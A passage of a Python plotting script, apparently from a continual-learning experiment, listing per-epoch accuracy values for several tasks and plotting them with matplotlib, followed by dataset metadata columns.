0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5993575783972126, 0.5963087979094077, 0.5963087979094077]
# Task 6
# y6 = [0.21260122808578802, 0.2588769244460265, 0.31129304974637356, 0.31583162765862777, 0.4743258876924446, 0.48972145590460087, 0.5092996351339325, 0.5359081605410697, 0.5369760612263059, 0.5505917949630684, 0.561893743881819, 0.5632286197383644, 0.5834297410340838, 0.5819168817299991, 0.5932188306487497, 0.5978464002847735, 0.5972234582183857, 0.6168016374477173, 0.6123520512592329, 0.6145768443534751, 0.6214292070837412, 0.6269466939574619, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6240989587968319, 0.6285485449853163, 0.629527453946783, 0.6371807421909762, 0.6338880484114977, 0.6338880484114977, 0.6338880484114977, 0.6370027587434368, 0.6370027587434368, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6468808400818724, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6454569725015573, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6467918483581027, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6404734359704547, 0.6483047076621874, 0.6483047076621874, 0.6475037821482602, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6446560469876301, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6460799145679452, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.6385156180475215, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.642965204236006, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144]
# y6_Mem = [0.22532704458485361, 0.3608614398860906, 0.43926314852718695, 0.5018243303372786, 0.5473880929073596, 0.5903710954881196, 0.647859749043339, 0.6757141585832518, 0.7047254605321706, 0.7232357390762659, 0.7334697873097802, 0.7540268755005785, 0.7652398326955593, 0.7699563940553529, 0.7749399305864555, 0.7780546409183946, 0.7799234671175581, 0.7887336477707573, 0.7849070036486607, 0.7878437305330604, 0.7980777787665747, 0.7938951677493993, 0.7919373498264661, 0.7933612174067811, 0.7933612174067811, 0.666192044139895, 0.6679718786152887, 0.6746462578980155, 0.6733113820414701, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6758031503070214, 0.6750912165168639, 0.6886179585298567, 0.6683278455103675, 0.6683278455103675, 0.6683278455103675, 0.6683278455103675, 0.6737563406603186, 0.6737563406603186, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.6669929696538222, 0.6669929696538222, 0.6442110883687817, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6119960843641541, 0.6119960843641541]
# This function is used to plot all the accuracies from all tasks in one plot.
x = []
x = list(range(1, len(val)+1))
fig = plt.figure()
plt.plot(x, y1)
plt.plot(x, y2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.plot(x, y5)
plt.plot(x, y6)
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend(["Task 1", "Task 2", "Task 3", "Task 4", "Task 5", "Task 6"])
plt.show()
fig.savefig('task_{}_original_loss_{}.png'.format(1, round(val[199], 6)))
| 1,165.788462
| 4,015
| 0.846736
| 6,131
| 60,621
| 8.369271
| 0.067689
| 0.06593
| 0.069457
| 0.131197
| 0.889597
| 0.883672
| 0.883672
| 0.879677
| 0.879677
| 0.873382
| 0
| 0.88627
| 0.051847
| 60,621
| 51
| 4,016
| 1,188.647059
| 0.006455
| 0.992511
| 0
| 0
| 0
| 0
| 0.183099
| 0.065728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.